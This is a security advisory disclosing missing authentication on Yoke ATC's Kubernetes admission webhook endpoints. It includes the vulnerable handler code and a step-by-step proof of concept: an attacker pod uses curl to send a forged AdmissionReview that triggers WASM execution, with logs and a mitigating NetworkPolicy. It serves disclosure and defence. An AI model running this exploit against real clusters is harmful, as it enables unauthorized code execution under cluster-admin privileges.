Unauthenticated Admission Webhook Endpoints in Yoke ATC

This vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. The ATC webhook endpoints lack proper authentication mechanisms, allowing any pod within the cluster network to directly send AdmissionReview requests to the webhook, bypassing Kubernetes API Server authentication. This enables attackers to trigger WASM module execution in the ATC controller context without proper authorization.

Recommended CWE: CWE-306 (Missing Authentication for Critical Function)

Summary

Yoke ATC implements multiple Admission Webhook endpoints (/validations/{airway}, /validations/resources, /validations/flights.yoke.cd, /validations/airways.yoke.cd, etc.) that process AdmissionReview requests. These endpoints do not implement TLS client certificate authentication or request source validation. Any client that can reach the ATC service within the cluster can send requests directly to these endpoints, bypassing the Kubernetes API Server's authentication and authorization mechanisms.

Details

The vulnerability exists in the HTTP handler implementation where webhook endpoints accept and process requests without verifying the client identity.

Vulnerable Endpoint Handlers (cmd/atc/handler.go:147-335):

mux.HandleFunc("POST /validations/{airway}", func(w http.ResponseWriter, r *http.Request) {
    var review admissionv1.AdmissionReview
    if err := json.NewDecoder(r.Body).Decode(&review); err != nil {
        http.Error(w, fmt.Sprintf("failed to decode review: %v", err), http.StatusBadRequest)
        return
    }
    // No authentication check - request is processed directly
    // ...
})

Additional Unauthenticated Endpoints:
- /validations/resources (cmd/atc/handler.go:337-538)
- /validations/external-resources (cmd/atc/handler.go:540-597)
- /validations/airways.yoke.cd (cmd/atc/handler.go:599-636)
- /validations/flights.yoke.cd (cmd/atc/handler.go:638-733)
- /crdconvert/{airway} (cmd/atc/handler.go:61-145)

The code lacks:
1. TLS client certificate verification
2. Request source validation (verifying requests come from kube-apiserver)
3. Any form of authentication middleware

PoC

Environment Setup

Prerequisites:
- Docker installed and running
- kubectl installed
- Go 1.21+ installed
- kind installed

Step 1: Create Kind cluster

cat > /tmp/kind-config.yaml << 'EOF'
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: yoke-vuln-test
nodes:
- role: control-plane
EOF

kind create cluster --config /tmp/kind-config.yaml

Step 2: Build and install Yoke CLI

git clone https://github.com/yokecd/yoke.git
cd yoke
GOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke

Step 3: Deploy ATC

/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest

Step 4: Deploy Backend Airway example

/tmp/yoke takeoff -wait 60s backendairway "https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz"

Exploitation Steps

Step 1: Create attacker pod

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: webhook-attacker
  namespace: default
spec:
  containers:
  - name: attacker
    image: curlimages/curl:latest
    command: ["sleep", "infinity"]
EOF

kubectl wait --for=condition=Ready pod/webhook-attacker --timeout=60s

Step 2: Probe webhook endpoints from attacker pod

kubectl exec webhook-attacker -- curl -k -s -w "\nHTTP_CODE: %{http_code}" \
  -X POST https://atc-atc.atc.svc.cluster.local:80/validations/resources \
  -H "Content-Type: application/json" -d '{}'

Actual output from verification:

panic

HTTP_CODE: 500

The HTTP 500 response (not 401/403) indicates the endpoint is accessible without authentication. The error is due to invalid request body format, not authentication failure.

Step 3: Send crafted AdmissionReview request

Create malicious request file:

cat > /tmp/malicious-review.json << 'EOF'
{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "request": {
    "uid": "vul002-exploit-uid",
    "kind": {"group": "examples.com", "version": "v1", "kind": "Backend"},
    "resource": {"group": "examples.com", "version": "v1", "resource": "backends"},
    "name": "exploit-backend",
    "namespace": "default",
    "operation": "CREATE",
    "userInfo": {"username": "attacker-from-pod", "groups": ["system:unauthenticated"]},
    "object": {
      "apiVersion": "examples.com/v1",
      "kind": "Backend",
      "metadata": {"name": "exploit-backend", "namespace": "default"},
      "spec": {"image": "nginx:latest", "replicas": 1}
    }
  }
}
EOF

kubectl cp /tmp/malicious-review.json webhook-attacker:/tmp/malicious-review.json

Send the request:

kubectl exec webhook-attacker -- curl -k -s -X POST \
  https://atc-atc.atc.svc.cluster.local:80/validations/backends.examples.com \
  -H "Content-Type: application/json" \
  -d @/tmp/malicious-review.json

Actual output from verification:

{"kind":"AdmissionReview","apiVersion":"admission.k8s.io/v1","request":{"uid":"vul002-normal-test","kind":{"group":"examples.com","version":"v1","kind":"Backend"},"resource":{"group":"examples.com","version":"v1","resource":"backends"},"name":"vul002-normal-backend","namespace":"default","operation":"CREATE","userInfo":{"username":"attacker-from-pod","groups":["system:unauthenticated"]},"object":{"apiVersion":"examples.com/v1","kind":"Backend","metadata":{"name":"vul002-normal-backend","namespace":"default"},"spec":{"image":"nginx:latest","replicas":1}},"oldObject":null,"options":null},"response":{"uid":"vul002-normal-test","allowed":false,"status":{"metadata":{},"status":"Failure","message":"applying resource returned errors during dry-run..."}}}

Step 4: Verify ATC logs

kubectl logs -n atc deployment/atc-atc --tail=20 | grep backends.examples.com

Actual log output:

{"time":"2026-02-01T15:29:08.890991543Z","level":"INFO","msg":"request served","component":"server","code":200,"method":"POST","path":"/validations/backends.examples.com","elapsed":"435ms","validation":{"allowed":false,"status":"Invalid"}}

The elapsed: 435ms indicates WASM module execution occurred.

Expected Result

The attacker pod successfully sends AdmissionReview requests directly to the ATC webhook endpoint without any authentication. The ATC controller processes the request and executes the WASM module, proving that:
1. No TLS client certificate is required
2. No request source validation occurs
3. The fake userInfo is accepted without verification
4. WASM modules are executed based on unauthenticated requests

Impact

Vulnerability Type: Missing Authentication / Authentication Bypass

Attack Prerequisites:
- Attacker has access to a pod within the cluster network
- Network policies do not restrict access to the ATC service (common in default configurations)

Impact Assessment:
- Confidentiality: Medium - Attacker can trigger WASM execution which may access controller context data
- Integrity: High - Combined with VUL-001, attacker can create arbitrary Kubernetes resources
- Availability: Medium - Attacker can cause resource exhaustion through repeated requests

Attack Scenario:
1. Attacker compromises a pod or gains access to the cluster network
2. Attacker sends crafted AdmissionReview requests directly to ATC webhook
3. ATC processes requests without verifying they came from the API Server
4. Combined with annotation injection (VUL-001), attacker can execute arbitrary WASM code
5. Malicious WASM can create resources or exfiltrate data using ATC's cluster-admin privileges

Severity

CVSS v3.1 Score: 7.5 (High)

Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

• Attack Vector (AV): Network - Accessible from cluster network
• Attack Complexity (AC): Low - Simple HTTP request
• Privileges Required (PR): None - No authentication required
• User Interaction (UI): None - Automatic processing
• Scope (S): Unchanged
• Confidentiality (C): None - Direct impact limited
• Integrity (I): High - Can trigger unauthorized WASM execution
• Availability (A): None - No direct availability impact

Note: When combined with VUL-001, the overall impact increases significantly.

Affected Versions

• Yoke ATC v0.18.x and earlier versions
• All versions that implement Admission Webhook endpoints without client authentication

Patched Versions

No patch available at time of disclosure.

Workarounds

1. Network Policy: Deploy NetworkPolicy to restrict access to ATC service, allowing only kube-apiserver to connect

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: atc-webhook-policy
  namespace: atc
spec:
  podSelector:
    matchLabels:
      yoke.cd/app: atc
  policyTypes:
  - Ingress
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
      podSelector:
        matchLabels:
          component: kube-apiserver

2. Service Mesh: Use a service mesh (Istio, Linkerd) to enforce mTLS between services

3. Pod Security: Implement strict pod security policies to limit which pods can be created in the cluster

References

• Yoke Project: https://github.com/yokecd/yoke
• Kubernetes Admission Webhooks: https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/
• CWE-306: Missing Authentication for Critical Function: https://cwe.mitre.org/data/definitions/306.html

Credits

credit for:
@b0b0haha ([email protected])
@lixingquzhi ([email protected])